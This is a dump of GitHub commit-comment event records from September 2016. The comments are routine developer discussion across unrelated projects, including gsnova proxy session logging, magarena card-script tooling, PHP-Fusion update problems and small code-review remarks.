{"id":"4544232260","type":"CommitCommentEvent","actor":{"login":"devcodewak"},"repo":{"name":"yinqiwen/gsnova"},"payload":{"comment":{"id":18973986,"position":null,"line":null,"path":null,"commit_id":"e56a5095d2a5a1b9ca83d86061885bd5b5887f5c","created_at":"2016-09-10T15:32:00Z","updated_at":"2016-09-10T15:32:00Z","body":"@yinqiwen 部署了heroku 5683e54, \r\n按你建议加大了remote/proxy.go readNetwork()中 SetReadDeadline，长连接稳。\r\n\r\n客户端添些代码，利用 heartbeat 动态显示下 session 分配使用情况。测配5个app, 2ConnsPerServer效果:\r\n\r\n```\r\n2016/09/10 23:00:41 local_server.go:66: Local proxy recv socks5 proxy conn to avatars3.githubusercontent.com:443\r\n2016/09/10 23:00:41 channel.go:145: heartbeat addr:3 index[1]  6/58 [2 12 22 32 41 52]\r\n2016/09/10 23:00:41 channel.go:145: heartbeat addr:0 index[0]  6/58 [3 13 23 33 44 53]\r\n2016/09/10 23:00:41 channel.go:145: heartbeat addr:4 index[1]  5/58 [10 20 30 42 50]\r\n2016/09/10 23:00:42 channel.go:145: heartbeat addr:0 index[1]  6/58 [4 14 24 34 43 54]\r\n2016/09/10 23:00:42 channel.go:145: heartbeat addr:1 index[0]  6/58 [5 15 25 35 45 55]\r\n2016/09/10 23:00:44 channel.go:145: heartbeat addr:1 index[1]  6/58 [6 16 26 36 46 56]\r\n2016/09/10 23:00:44 channel.go:145: heartbeat addr:2 index[0]  6/58 [7 18 27 37 47 57]\r\n2016/09/10 23:00:45 channel.go:145: heartbeat addr:3 index[0]  6/58 [1 11 21 31 40 51]\r\n2016/09/10 23:00:45 channel.go:145: heartbeat addr:4 index[0]  5/58 [9 19 29 39 49]\r\n2016/09/10 23:00:45 channel.go:145: heartbeat addr:2 index[1]  6/58 [8 17 28 38 48 58]\r\n2016/09/10 23:00:45 local_server.go:66: Local proxy recv socks5 proxy conn to api.github.com:443\r\n2016/09/10 23:00:46 channel.go:145: heartbeat addr:0 index[0]  6/59 [3 13 23 33 44 53]\r\n2016/09/10 23:00:46 channel.go:145: heartbeat addr:3 index[1]  6/59 [2 12 22 32 41 52]\r\n2016/09/10 23:00:46 channel.go:145: heartbeat addr:4 index[1]  5/59 [10 20 30 42 50]\r\n2016/09/10 23:00:47 channel.go:145: heartbeat addr:1 index[0]  6/59 [5 15 25 35 45 55]\r\n\r\n\r\n```\r\n不发 requests 了，代码供参考：\r\nlocal\\proxy\\channel.go heartbeat() 中添加：\r\n\r\n`\r\n\t\t\t\tlog.Printf(\"heartbeat %s\", listProxySession(rc.Index, rc.Addr))\r\n`\r\n\r\n\r\nlocal\\proxy\\channel.go 中添加:\r\n ```\r\n\r\nvar listMapMutex sync.Mutex\r\nvar listMapAddr = make(map[string]int)\r\n\r\nfunc listGetAddrId(Addr string) int {\r\n\tlistMapMutex.Lock()\r\n\tdefer listMapMutex.Unlock()\r\n\tif id, isPresent := listMapAddr[Addr]; isPresent {\r\n\t\treturn id\r\n\t}\r\n\tid := len(listMapAddr)\r\n\tlistMapAddr[Addr] = id\r\n\treturn id\r\n}\r\n\r\nfunc listProxySession(Index int, Addr string) string {\r\n\tsessionMutex.Lock()\r\n\t//defer sessionMutex.Unlock()\r\n\tvar nlen int\r\n\tif nlen = len(sessions); nlen == 0 {\r\n\t\tsessionMutex.Unlock()\r\n\t\treturn \"session none.\"\r\n\t}\r\n\tvar sid []int\r\n\tfor id, sess := range sessions {\r\n\t\tif sess != nil && sess.Remote != nil && sess.Remote.Index == Index && sess.Remote.Addr == Addr {\r\n\t\t\tsid = append(sid, int(id))\r\n\t\t}\r\n\t}\r\n\tsessionMutex.Unlock()\r\n\tsort.Ints(sid)\r\n\treturn fmt.Sprintf(\"addr:%d index[%d] %2d/%d %v\", listGetAddrId(Addr), Index, len(sid), nlen, sid)\r\n}\r\n\r\n\r\n```\r\n"}},"created_at":"2016-09-10T15:32:00Z"}
{"id":"4544233737","type":"CommitCommentEvent","actor":{"login":"dave-theunsub"},"repo":{"name":"dave-theunsub/clamtk"},"payload":{"comment":{"id":18973987,"position":null,"line":null,"path":null,"commit_id":"1a817a41eb12208f952d466138dcf4967de4c512","created_at":"2016-09-10T15:33:01Z","updated_at":"2016-09-10T15:33:01Z","body":">> Is the github page for each project the best place to file bug reports?  \r\n  \r\nI guess so, but occasionally folks file bugs on https://launchpad.net/clamtk .  Do you have a Launchpad account?  I can add you there too - however, only clamtk is there, not the plugins.\r\n\r\n>> (Is there a template that can be used for bug reports?)  \r\n  \r\nNot yet, but feel free to make one.\r\n\r\nAlso, I updated the README some more.  And you are a collaborator on clamtk main, if you want.  Right now, the only Python/Perl interaction takes place in clamtk main file.  But there might be other things you want to play with as well."}},"created_at":"2016-09-10T15:33:01Z"}
{"id":"4544234685","type":"CommitCommentEvent","actor":{"login":"Narflex"},"repo":{"name":"google/sagetv"},"payload":{"comment":{"id":18973990,"position":null,"line":null,"path":null,"commit_id":"a75c8bdfb0726c7a09406dbf14803e5aa47a9c02","created_at":"2016-09-10T15:33:41Z","updated_at":"2016-09-10T15:33:41Z","body":"Ok, can you change it to be a whitelist instead of a blacklist so it'll\nmake it easier to strip out all the Unicode chars? Or I can make the\nchange....either way.\n\nJeff Kardatzke\nSent from my Android\n\nOn Sep 10, 2016 6:06 AM, \"Jeff Harrison\" <notifications@github.com> wrote:\n\n> The purpose was to create a filename that represented as close as possible\n> the 'real' name of the program being recorded. There is a list of\n> characters not allowed to be used as they are typically not allowed by file\n> systems. I will also cc this response to the forum thread mentioned above.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/google/sagetv/commit/a75c8bdfb0726c7a09406dbf14803e5aa47a9c02#commitcomment-18973583>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ANEIDAQvbg6AlQT4luthb77tXmw2-ZTIks5qoqs3gaJpZM4J5Ugp>\n> .\n>\n"}},"created_at":"2016-09-10T15:33:41Z"}
{"id":"4544235157","type":"CommitCommentEvent","actor":{"login":"mostaphaRoudsari"},"repo":{"name":"mostaphaRoudsari/Honeybee"},"payload":{"comment":{"id":18973991,"position":null,"line":null,"path":null,"commit_id":"3af42f76c3b06a3dc45c8ee79db712137b67c7c3","created_at":"2016-09-10T15:33:59Z","updated_at":"2016-09-10T15:33:59Z","body":"@chriswmackey thanks! It will be quite useful."}},"created_at":"2016-09-10T15:33:59Z"}
{"id":"4544236187","type":"CommitCommentEvent","actor":{"login":"IshikawaW51h"},"repo":{"name":"F1ashPlayer/fucking-dust-box"},"payload":{"comment":{"id":18973993,"position":null,"line":null,"path":null,"commit_id":"10c156cba21792c905e6f995113e886892aad57b","created_at":"2016-09-10T15:34:41Z","updated_at":"2016-09-10T15:34:41Z","body":"**Nice.**"}},"created_at":"2016-09-10T15:34:41Z"}
{"id":"4544238084","type":"CommitCommentEvent","actor":{"login":"mmalohlava"},"repo":{"name":"h2oai/h2o-3"},"payload":{"comment":{"id":18973999,"position":12,"line":130,"path":"h2o-algos/src/main/java/hex/deepwater/DeepWaterImageIterator.java","commit_id":"7897cb0fead964d9cd6f7c5f0f624440219e6ba0","created_at":"2016-09-10T15:35:52Z","updated_at":"2016-09-10T15:35:52Z","body":"yup, that's good observation for our context - GC is mostly JNI aware but probably not in this context - passing  pointer to array to JNI in async thread."}},"created_at":"2016-09-10T15:35:52Z"}
{"id":"4544238402","type":"CommitCommentEvent","actor":{"login":"BevapDin"},"repo":{"name":"CleverRaven/Cataclysm-DDA"},"payload":{"comment":{"id":18974000,"position":null,"line":null,"path":null,"commit_id":"f84b92776632daa36528dd2ca14256c2d1cd80ae","created_at":"2016-09-10T15:36:02Z","updated_at":"2016-09-10T15:36:02Z","body":"It's a spelling mistake. All other source files use `skill_electronics`(with two \"l\") and similar, and it contains a skill id, not a skill level. Feel free to make a PR to correct this.\r\n"}},"created_at":"2016-09-10T15:36:02Z"}
{"id":"4544241369","type":"CommitCommentEvent","actor":{"login":"joeybeboy"},"repo":{"name":"joeybeboy/ubiquitous-palm-tree"},"payload":{"comment":{"id":18974006,"position":null,"line":null,"path":null,"commit_id":"c9017179032dcd978fe0c6d6f67b5a5f12d166f8","created_at":"2016-09-10T15:38:01Z","updated_at":"2016-09-10T15:38:01Z","body":"c901717"}},"created_at":"2016-09-10T15:38:01Z"}
{"id":"4544241797","type":"CommitCommentEvent","actor":{"login":"gandm"},"repo":{"name":"gandm/language-babel"},"payload":{"comment":{"id":18974008,"position":null,"line":null,"path":null,"commit_id":"d6ec93d5f3cc37aaffe5e81e7e35920bab69e2a0","created_at":"2016-09-10T15:38:17Z","updated_at":"2016-09-10T15:38:17Z","body":"I just comment out the lines I don't need. I don't find it any different from using fit/fdescribe as each grammar test file is a single line of code. Mostly, if I make a change to the grammar I run a full test anyway and then add the specs for the new stuff. I have a tool that makes adding the specs quite easy. I guess I could upload it."}},"created_at":"2016-09-10T15:38:17Z"}
{"id":"4544242431","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18974009,"position":null,"line":null,"path":null,"commit_id":"11c622443d7563d1dcd1c867263093809b94fa2a","created_at":"2016-09-10T15:38:45Z","updated_at":"2016-09-10T15:38:45Z","body":"113836013-Swimming-Pool-Evaporation-and-Cover-Issues (mjwitte) - Win64-Windows-7-VisualStudio-12: OK (1762 of 1762 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-11c622443d7563d1dcd1c867263093809b94fa2a-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-11c622443d7563d1dcd1c867263093809b94fa2a-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-10T15:38:45Z"}
{"id":"4544242619","type":"CommitCommentEvent","actor":{"login":"fedemotta"},"repo":{"name":"fedemotta/yii2-bootstrap-list-filter"},"payload":{"comment":{"id":18974010,"position":null,"line":null,"path":null,"commit_id":"02404b599e6630358fb4bbaa516c404160d228f1","created_at":"2016-09-10T15:38:51Z","updated_at":"2016-09-10T15:38:51Z","body":"Fixes #1 "}},"created_at":"2016-09-10T15:38:51Z"}
{"id":"4544244708","type":"CommitCommentEvent","actor":{"login":"yinqiwen"},"repo":{"name":"yinqiwen/gsnova"},"payload":{"comment":{"id":18974012,"position":null,"line":null,"path":null,"commit_id":"54e857c7c7e1b7996f88d075b0b1ec2a9d1d2361","created_at":"2016-09-10T15:40:15Z","updated_at":"2016-09-10T15:40:15Z","body":"Add your ip into hosts.json.  For gae, u should configure your ip for '*.appspot.com' .  \r\n\r\nFor fakecert issue, u must import the 'Fake-ACRoot-Certificate.cer' into your os's root CA to avoid the warnings of browsers, u can follow 12306's guide to import a root CA file. (12306 force u to import it's root CA file if u want to use it's service.)\r\n\r\nu can  generate the facecert files by openssl's command line tools, but it's complicated and i'm not remember how to do it now, can not give any advice.  \r\n\r\n\r\n\r\n"}},"created_at":"2016-09-10T15:40:15Z"}
{"id":"4544245109","type":"CommitCommentEvent","actor":{"login":"philmmanjaro"},"repo":{"name":"manjaro/calamares"},"payload":{"comment":{"id":18974013,"position":null,"line":null,"path":null,"commit_id":"6927ca643961a9f83963a23d7795ccd24044d248","created_at":"2016-09-10T15:40:29Z","updated_at":"2016-09-10T15:40:29Z","body":"It depends if the **mirrorscfg** should only rank on **live-session** or also in **chroot** for the target installation. Live-Session I think gets ranked already by some live-scripts, if I remember correctly ..."}},"created_at":"2016-09-10T15:40:29Z"}
{"id":"4544247662","type":"CommitCommentEvent","actor":{"login":"Mr-Kumar-Abhishek"},"repo":{"name":"Mr-Kumar-Abhishek/wp-theme-twenty-sixteen-child"},"payload":{"comment":{"id":18974015,"position":null,"line":null,"path":null,"commit_id":"1cda4d6c648f32e4b857d6e9d290b15c7bd2fb6c","created_at":"2016-09-10T15:42:19Z","updated_at":"2016-09-10T15:42:19Z","body":"It is not reccomended to incude this in a theme but well as this is just a test case , putting it here."}},"created_at":"2016-09-10T15:42:19Z"}
{"id":"4544247698","type":"CommitCommentEvent","actor":{"login":"melvinzhang"},"repo":{"name":"magarena/magarena"},"payload":{"comment":{"id":18974016,"position":null,"line":null,"path":null,"commit_id":"ece15ab802cc84fede5037ed07cda548e07fb265","created_at":"2016-09-10T15:42:20Z","updated_at":"2016-09-10T15:42:20Z","body":"Thanks for taking the time to clarify my doubts. It is much clearer now. I agree with you, doing it with fresh scripts is better. Replacing image property is outside the scope of scripts-builder, it should be focus on generating the full card script from JSON.\r\n\r\nThere should be a update tool to do the merging, so you can take the fresh script and the current script and specify a property. This tool will generate a merged script with all lines taken from the current script except for the specified property from the fresh script.\r\n\r\nThis tool can have some special support for auto inserting image_update property as well. Then we can run this once for each fresh script and specify the properties to be updated. This will ensure that only the specified property gets changed and nothing else, so there is no chance of introduce functional errors into the cards.\r\n\r\n\r\n\r\n"}},"created_at":"2016-09-10T15:42:20Z"}
{"id":"4544248879","type":"CommitCommentEvent","actor":{"login":"udeved"},"repo":{"name":"manjaro/calamares"},"payload":{"comment":{"id":18974018,"position":null,"line":null,"path":null,"commit_id":"6927ca643961a9f83963a23d7795ccd24044d248","created_at":"2016-09-10T15:43:13Z","updated_at":"2016-09-10T15:43:13Z","body":"I think the live script should handle it, or better pacman-mirrors.\r\n\r\nAtm, it only randomizes the mirrors, but ranking them would be much better.\r\nHowever, current pacman-mirrors can't limit than to be ranked mirrors, so it would rank full list, which is boot time."}},"created_at":"2016-09-10T15:43:13Z"}
{"id":"4544249114","type":"CommitCommentEvent","actor":{"login":"Mr-Kumar-Abhishek"},"repo":{"name":"Mr-Kumar-Abhishek/wp-theme-twenty-sixteen-child"},"payload":{"comment":{"id":18974019,"position":null,"line":null,"path":null,"commit_id":"1cda4d6c648f32e4b857d6e9d290b15c7bd2fb6c","created_at":"2016-09-10T15:43:22Z","updated_at":"2016-09-10T15:43:22Z","body":"It is not reccomended to incude this in a theme but well as this is just a test case , putting it here."}},"created_at":"2016-09-10T15:43:22Z"}
{"id":"4544252661","type":"CommitCommentEvent","actor":{"login":"ShawnieBoy"},"repo":{"name":"magarena/magarena"},"payload":{"comment":{"id":18974021,"position":null,"line":null,"path":null,"commit_id":"ece15ab802cc84fede5037ed07cda548e07fb265","created_at":"2016-09-10T15:45:55Z","updated_at":"2016-09-10T15:45:55Z","body":"No problem.\r\n\r\nSounds like a good idea - there will be times when only the oracle needs to be updated, or the url and rarity (rarity isn't overly used, but makes sense for the rarity to match the new image). Being able to pick and choose more easily would certainly make things both quicker and less error-prone"}},"created_at":"2016-09-10T15:45:55Z"}
{"id":"4544253480","type":"CommitCommentEvent","actor":{"login":"melvinzhang"},"repo":{"name":"magarena/magarena"},"payload":{"comment":{"id":18974023,"position":null,"line":null,"path":null,"commit_id":"ece15ab802cc84fede5037ed07cda548e07fb265","created_at":"2016-09-10T15:46:30Z","updated_at":"2016-09-10T15:46:30Z","body":"As a concrete example, it would look like the following\r\n```\r\n./update-scripts.sh \r\n  release/Magarena/scripts/Absorb.txt \r\n  scripts-builder/OUTPUT/scripts_missing/Absorb.txt \r\n  image,oracle,rarity > release/Magarena/scripts/Absorb.txt.new\r\n```\r\n\r\nThen use a loop to generate one call to this script for each file in scripts-builder/OUTPUT/scripts_missing/*.txt"}},"created_at":"2016-09-10T15:46:30Z"}
{"id":"4544254116","type":"CommitCommentEvent","actor":{"login":"jonsneyers"},"repo":{"name":"FLIF-hub/FLIF"},"payload":{"comment":{"id":18974024,"position":null,"line":null,"path":null,"commit_id":"e5c2c44c2373215185eebc9df4f6484a9f446a92","created_at":"2016-09-10T15:46:59Z","updated_at":"2016-09-10T15:46:59Z","body":"OK never mind, I figured out what was going on. See https://github.com/FLIF-hub/FLIF/commit/eb4c294a3e0e25113c978fd6ea5951dd48fc1c8b"}},"created_at":"2016-09-10T15:46:59Z"}
{"id":"4544254488","type":"CommitCommentEvent","actor":{"login":"Lavoaster"},"repo":{"name":"Poniverse/PonyExpo"},"payload":{"comment":{"id":18974025,"position":11,"line":25,"path":"js/main.js","commit_id":"50f83336892223694eb5a1951a97564b1115b97c","created_at":"2016-09-10T15:47:19Z","updated_at":"2016-09-10T15:47:19Z","body":"Why are two variables needed for this?"}},"created_at":"2016-09-10T15:47:19Z"}
{"id":"4544254909","type":"CommitCommentEvent","actor":{"login":"yinqiwen"},"repo":{"name":"yinqiwen/gsnova"},"payload":{"comment":{"id":18974026,"position":null,"line":null,"path":null,"commit_id":"e56a5095d2a5a1b9ca83d86061885bd5b5887f5c","created_at":"2016-09-10T15:47:38Z","updated_at":"2016-09-10T15:47:38Z","body":"client.json 里的默认Admin HTTP server会在 7788端口上提供一个stat查看的服务， 会列出每个channel的Session个数。  http://127.0.0.1:7788/stat\r\n\r\n"}},"created_at":"2016-09-10T15:47:38Z"}
{"id":"4544255824","type":"CommitCommentEvent","actor":{"login":"belackriv"},"repo":{"name":"belackriv/plugin-hbs"},"payload":{"comment":{"id":18974027,"position":null,"line":null,"path":null,"commit_id":"5eaf20996055f908561d32dbc7e453d43573eaff","created_at":"2016-09-10T15:48:16Z","updated_at":"2016-09-10T15:48:16Z","body":"Yah, that branch works, thanks!"}},"created_at":"2016-09-10T15:48:16Z"}
{"id":"4544256202","type":"CommitCommentEvent","actor":{"login":"Lavoaster"},"repo":{"name":"Poniverse/PonyExpo"},"payload":{"comment":{"id":18974028,"position":22,"line":46,"path":"js/main.js","commit_id":"50f83336892223694eb5a1951a97564b1115b97c","created_at":"2016-09-10T15:48:34Z","updated_at":"2016-09-10T15:48:34Z","body":"This can be simplified a  bit.\r\n\r\n```\r\nmenuIcon.inert = window.innerWidth > 600;\r\nnavbarList.inert = window.innerWidth > 600;\r\n\r\n-- or ---\r\n\r\nmenuIcon.inert = navbarList.inert = window.innerWidth > 600;\r\n```"}},"created_at":"2016-09-10T15:48:34Z"}
{"id":"4544256302","type":"CommitCommentEvent","actor":{"login":"logic-dev"},"repo":{"name":"Poniverse/PonyExpo"},"payload":{"comment":{"id":18974029,"position":11,"line":25,"path":"js/main.js","commit_id":"50f83336892223694eb5a1951a97564b1115b97c","created_at":"2016-09-10T15:48:38Z","updated_at":"2016-09-10T15:48:38Z","body":"One controls the inert state of the mobile nav button. The other cot\ncontrols the inert state of the mobile nav list. This is to prevent tabbing\nissues on desktop\n\nOn Sat, 10 Sep 2016, 16:47 Adam Lavin, <notifications@github.com> wrote:\n\n> Why are two variables needed for this?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Poniverse/PonyExpo/commit/50f83336892223694eb5a1951a97564b1115b97c#commitcomment-18974025>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAiYvrkNG55RJx-1BTGWg3WgxrPXLfAqks5qotEHgaJpZM4J5wC9>\n> .\n>\n"}},"created_at":"2016-09-10T15:48:38Z"}
{"id":"4544256508","type":"CommitCommentEvent","actor":{"login":"houd1ni"},"repo":{"name":"dimitrinicolas/marmottajax"},"payload":{"comment":{"id":18974030,"position":null,"line":null,"path":null,"commit_id":"815351fc8c72d4f0d2d4e6f333662264a29a8396","created_at":"2016-09-10T15:48:46Z","updated_at":"2016-09-10T15:48:46Z","body":"Okay! Sure, just created a new repo, added you as a contributor.\r\nI will create issues there if any special questions are appeared.\r\nI appreciate if you take a part :)"}},"created_at":"2016-09-10T15:48:46Z"}
{"id":"4544258711","type":"CommitCommentEvent","actor":{"login":"markusthoemmes"},"repo":{"name":"openwhisk/openwhisk"},"payload":{"comment":{"id":18974031,"position":5,"line":46,"path":"gradle/docker.gradle","commit_id":"de46808ee4fa1974c3eeeeef267ff197b8e889ff","created_at":"2016-09-10T15:50:24Z","updated_at":"2016-09-10T15:50:24Z","body":"Why not use `dockerBinary` here and parse the result of `docker -v` in Groovy instead of piping it into a Shell command?"}},"created_at":"2016-09-10T15:50:24Z"}
{"id":"4544258739","type":"CommitCommentEvent","actor":{"login":"Lavoaster"},"repo":{"name":"Poniverse/PonyExpo"},"payload":{"comment":{"id":18974032,"position":11,"line":25,"path":"js/main.js","commit_id":"50f83336892223694eb5a1951a97564b1115b97c","created_at":"2016-09-10T15:50:25Z","updated_at":"2016-09-10T15:50:25Z","body":"Is there a need for the variables to be separate? It could be simplified to `isMobileView`?"}},"created_at":"2016-09-10T15:50:25Z"}
{"id":"4544259021","type":"CommitCommentEvent","actor":{"login":"devcodewak"},"repo":{"name":"yinqiwen/gsnova"},"payload":{"comment":{"id":18974033,"position":null,"line":null,"path":null,"commit_id":"e56a5095d2a5a1b9ca83d86061885bd5b5887f5c","created_at":"2016-09-10T15:50:39Z","updated_at":"2016-09-10T15:50:39Z","body":"是的，用了。\r\n添这些代码是为了观察长连接session id保持情况。\r\n最早建立的web console的session id可看到最小，一直保持着。"}},"created_at":"2016-09-10T15:50:39Z"}
{"id":"4544259783","type":"CommitCommentEvent","actor":{"login":"khayatkd"},"repo":{"name":"khayatkd/floodlight"},"payload":{"comment":{"id":18974035,"position":null,"line":null,"path":null,"commit_id":"c1cbbd5ecd4354541c85be24222098c9990899a6","created_at":"2016-09-10T15:51:15Z","updated_at":"2016-09-10T15:51:15Z","body":"Issue: \r\nWhen the Floodlight Firewall Module receives a Rule it checks if the rule is parsable or not. If a \r\nrule is not parsable the rule is discarded and the module responds with a Rule not parsable \r\nmessage. If a rule is parsable the module compares the new rule with all other rules to check \r\nwhether if the new rule is already configured in the firewall module rules list. \r\n\r\nResolution : \r\nWith this new rule code after checking if the data received is parsable and if the \r\nnew rule already exists in the firewall module rule lists we will need to check if the acceptance \r\nof this rules makes any sense so we have to check if the new rule overlaps with any of the \r\ncurrent rule. \r\nFirst we just check if there is any rule with the same rule priority as the current rule. If \r\na new Rule has higher or lower priority comparing to the currently configured rules list the rule \r\nmust be accepted. The acceptance of this rule might deprecate some already configured rules.  \r\nSecondly we check if the new rule overlaps with any other rule. I’ve added a \r\ncheckRuleOverlap method to the java file."}},"created_at":"2016-09-10T15:51:15Z"}
{"id":"4544260185","type":"CommitCommentEvent","actor":{"login":"JimGBritt"},"repo":{"name":"Azure/azure-quickstart-templates"},"payload":{"comment":{"id":18974036,"position":null,"line":null,"path":null,"commit_id":"0ab249c5e3335243cda4225547cc00d51c36eec2","created_at":"2016-09-10T15:51:32Z","updated_at":"2016-09-10T15:51:32Z","body":"Great change, thank you for updating.  I had been trying to get this updated this week but hadn't had a chance.  The file name actually needs to change as well as reference in the ARM template to avoid collisions with the SQL Azure solution."}},"created_at":"2016-09-10T15:51:32Z"}
{"id":"4544260938","type":"CommitCommentEvent","actor":{"login":"ShawnieBoy"},"repo":{"name":"magarena/magarena"},"payload":{"comment":{"id":18974037,"position":null,"line":null,"path":null,"commit_id":"ece15ab802cc84fede5037ed07cda548e07fb265","created_at":"2016-09-10T15:52:04Z","updated_at":"2016-09-10T15:52:04Z","body":"Looks good to me"}},"created_at":"2016-09-10T15:52:04Z"}
{"id":"4544262205","type":"CommitCommentEvent","actor":{"login":"plusk01"},"repo":{"name":"zamora18/robot-soccer"},"payload":{"comment":{"id":18974039,"position":null,"line":null,"path":null,"commit_id":"7d93f03fa391531d5d427e4363f6b3198e055220","created_at":"2016-09-10T15:53:05Z","updated_at":"2016-09-10T15:53:05Z","body":"About time..."}},"created_at":"2016-09-10T15:53:05Z"}
{"id":"4544262398","type":"CommitCommentEvent","actor":{"login":"IntelOrca"},"repo":{"name":"OpenRCT2/OpenRCT2"},"payload":{"comment":{"id":18974041,"position":8,"line":279,"path":"src/world/map.h","commit_id":"9f4a70d642bc9f276abe385f56f7c679468c588b","created_at":"2016-09-10T15:53:12Z","updated_at":"2016-09-10T15:53:12Z","body":"I was just being consistent with the others."}},"created_at":"2016-09-10T15:53:12Z"}
{"id":"4544262547","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"hakaru-dev/hakaru"},"payload":{"comment":{"id":18974042,"position":null,"line":null,"path":null,"commit_id":"f06bb48ebebbffee2d62bbf5f3bd9a0cd537c9fb","created_at":"2016-09-10T15:53:18Z","updated_at":"2016-09-10T15:53:18Z","body":"So this does cause a test failure: \r\n\r\n    (d7_normalFB1) Disintegrate N(0,1)*N(x,1), over (y+y)+x failed\r\n     Expected result : {Weight(1/26*exp(-1/26*t^2)/Pi^(1/2)*13^(1/2)*2^(1/2),Ret(_Unit))}\r\n     Evaluated result: {Weight(1/4*2^(1/2)/Pi^(1/2)*Int(1/2*2^(1/2)*exp(-13/8*`x乃`^2)/exp(t^2)^(1/8)*exp(3/4*`x乃`*t)/Pi^(1/2),`x乃` = -infinity .. infinity),Ret(_Unit))}\r\n\r\nThe result is correct, just not as pretty as we'd like.  I would say that it is not premature to figure out where that `Int` really came from.  Doing something about may well be a different matter."}},"created_at":"2016-09-10T15:53:18Z"}
{"id":"4544263513","type":"CommitCommentEvent","actor":{"login":"Catzenjaeger"},"repo":{"name":"php-fusion/PHP-Fusion"},"payload":{"comment":{"id":18974044,"position":null,"line":null,"path":null,"commit_id":"72480ef1f771c2e0dabae1e64538da068e4da58f","created_at":"2016-09-10T15:54:00Z","updated_at":"2016-09-10T15:54:00Z","body":"after i change all 4 files my sites are blank :("}},"created_at":"2016-09-10T15:54:00Z"}
{"id":"4544266025","type":"CommitCommentEvent","actor":{"login":"Catzenjaeger"},"repo":{"name":"php-fusion/PHP-Fusion"},"payload":{"comment":{"id":18974051,"position":null,"line":null,"path":null,"commit_id":"72480ef1f771c2e0dabae1e64538da068e4da58f","created_at":"2016-09-10T15:55:56Z","updated_at":"2016-09-10T15:55:56Z","body":"core functions makes the error! i have set all files back and found when i change core functions file i get the problems"}},"created_at":"2016-09-10T15:55:56Z"}
{"id":"4544266534","type":"CommitCommentEvent","actor":{"login":"melvinzhang"},"repo":{"name":"magarena/magarena"},"payload":{"comment":{"id":18974053,"position":null,"line":null,"path":null,"commit_id":"ece15ab802cc84fede5037ed07cda548e07fb265","created_at":"2016-09-10T15:56:21Z","updated_at":"2016-09-10T15:56:21Z","body":"Thanks for the feedback. Added https://github.com/magarena/magarena/issues/837 to work on this update tool."}},"created_at":"2016-09-10T15:56:21Z"}
{"id":"4544268581","type":"CommitCommentEvent","actor":{"login":"RobiNN1"},"repo":{"name":"php-fusion/PHP-Fusion"},"payload":{"comment":{"id":18974058,"position":null,"line":null,"path":null,"commit_id":"72480ef1f771c2e0dabae1e64538da068e4da58f","created_at":"2016-09-10T15:57:58Z","updated_at":"2016-09-10T15:57:58Z","body":"on my test site works all "}},"created_at":"2016-09-10T15:57:58Z"}
{"id":"4544270747","type":"CommitCommentEvent","actor":{"login":"rugrus"},"repo":{"name":"Lunat1q/Catchem-PoGo"},"payload":{"comment":{"id":18974064,"position":null,"line":null,"path":null,"commit_id":"1aa326148e1e91aa8c1e013c5c3ecaec11cb42b2","created_at":"2016-09-10T15:59:40Z","updated_at":"2016-09-10T15:59:40Z","body":"Hi, can you show the stats of the game ? i'd like to see how far i walk, how many catches.. :)\r\nTy, good work btw :D"}},"created_at":"2016-09-10T15:59:40Z"}
{"id":"4544272105","type":"CommitCommentEvent","actor":{"login":"Catzenjaeger"},"repo":{"name":"php-fusion/PHP-Fusion"},"payload":{"comment":{"id":18974066,"position":null,"line":null,"path":null,"commit_id":"72480ef1f771c2e0dabae1e64538da068e4da58f","created_at":"2016-09-10T16:00:24Z","updated_at":"2016-09-10T16:00:24Z","body":"**ok i give up**\r\n\r\nafter i make all fixes from today my sites is totally destroyed  -- nothing works anymore. i have to load my backup or must wait for Frederick take a look on my server whats happen\r\n\r\n"}},"created_at":"2016-09-10T16:00:24Z"}
{"id":"4544272982","type":"CommitCommentEvent","actor":{"login":"HowardHinnant"},"repo":{"name":"HowardHinnant/date"},"payload":{"comment":{"id":18974067,"position":null,"line":null,"path":null,"commit_id":"59d9cfa96dcd407308c6eaf5f8dc3ae612d117a3","created_at":"2016-09-10T16:00:55Z","updated_at":"2016-09-10T16:00:55Z","body":"Thanks!  Fixed in https://github.com/HowardHinnant/date/commit/845ce25bb7b715d5d53d8b2d14bb135c40082f94"}},"created_at":"2016-09-10T16:00:55Z"}
{"id":"4544273902","type":"CommitCommentEvent","actor":{"login":"RobiNN1"},"repo":{"name":"php-fusion/PHP-Fusion"},"payload":{"comment":{"id":18974068,"position":null,"line":null,"path":null,"commit_id":"72480ef1f771c2e0dabae1e64538da068e4da58f","created_at":"2016-09-10T16:01:30Z","updated_at":"2016-09-10T16:01:30Z","body":"in maincore delete line 19"}},"created_at":"2016-09-10T16:01:30Z"}
{"id":"4544274123","type":"CommitCommentEvent","actor":{"login":"HridayHS"},"repo":{"name":"HridayHS/android_device_yu_tomato"},"payload":{"comment":{"id":18974070,"position":null,"line":null,"path":null,"commit_id":"dbf12cb94e7c946800352a62997bf7162ea9f8e4","created_at":"2016-09-10T16:01:38Z","updated_at":"2016-09-10T16:01:38Z","body":"Test commit for someone"}},"created_at":"2016-09-10T16:01:38Z"}
{"id":"4544277407","type":"CommitCommentEvent","actor":{"login":"MrPowerGamerBR"},"repo":{"name":"rutgerkok/Pokkit"},"payload":{"comment":{"id":18974075,"position":null,"line":null,"path":null,"commit_id":"c1aae6eb776009ecbd65028ebe63cae2878580d3","created_at":"2016-09-10T16:03:46Z","updated_at":"2016-09-10T16:03:46Z","body":"\"Build status: error\".\r\n\r\nClose enough :P\r\n\r\n(You need to make Travis compile Nukkit first, then Pokkit)"}},"created_at":"2016-09-10T16:03:46Z"}
